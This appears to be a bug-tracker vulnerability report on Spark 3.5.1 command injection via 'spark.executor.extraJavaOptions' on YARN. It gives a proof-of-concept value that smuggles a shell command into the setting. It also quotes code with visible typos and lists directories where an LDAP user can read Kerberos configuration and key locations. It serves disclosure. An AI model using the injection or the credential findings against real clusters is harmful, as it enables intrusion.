Details
-
Improvement
-
Status: Open
-
Major
-
Resolution: Unresolved
-
3.5.1
-
None
-
None
-
Important
Description
First, we need to obtain regular user privileges and construct a JAR file according to custom rules.When yarn submits a task, I put a command-injection string on a parameter named "spark.executor.extraJavaOptions", it's about "\'touch\$IFS/tmp/czjtest\'"
There are two ways to submit parameters:
- Using command lines:spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/tmp/czjtest\`" test.jar
- Using java API:sparkLauncher.setConf("spark.executor.extraJavaOptions", "`touch$IFS/tmp/czjtest`");
We may find command-injection logs in hadoop.
I found the vulnerability exposed in file `ExexcutorRunnable.scale`:
//Set extra Java options for the executor, if defined
sparkConf.get(EXECUTOR_JAVA_OPTIONS).foreach{ opt => val
subsOpt = Utils.subtitudeAppNExecIds(opts, appId, executorId) javaOpts ++= Utils.splitCommandString(subsOpt).map(YarnSparkHadopUtil.escapeForShell)
}
CVSS score: 8.8(AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
In the directory Bigdata/common/runtime/security, there are security configurations, and the krb5.conf file is readable by the ldapuser, with the key location accessible.
In Bigdata/FusionInsight_Current/1_5_DataNode/install/hadoop, the ldapuser has read and execute permissions, allowing the execution of commands such as hadoop, hdfs, and yarn.
In Bigdata/FusionInsight_Current/1_6_NodeManager/etc, the ldapuser has read permissions, and there are business configurations present.
In Bigdata/FusionInsight_Current/1_6_NodeManager/install/hadoop, the ldapuser has read and execute permissions, allowing the execution of commands such as hadoop, hdfs, and yarn.
In Bigdata/FusionInsight_Current/1_8_RegionServer, the ldapuser has read permissions on a few files, and there are business configurations present.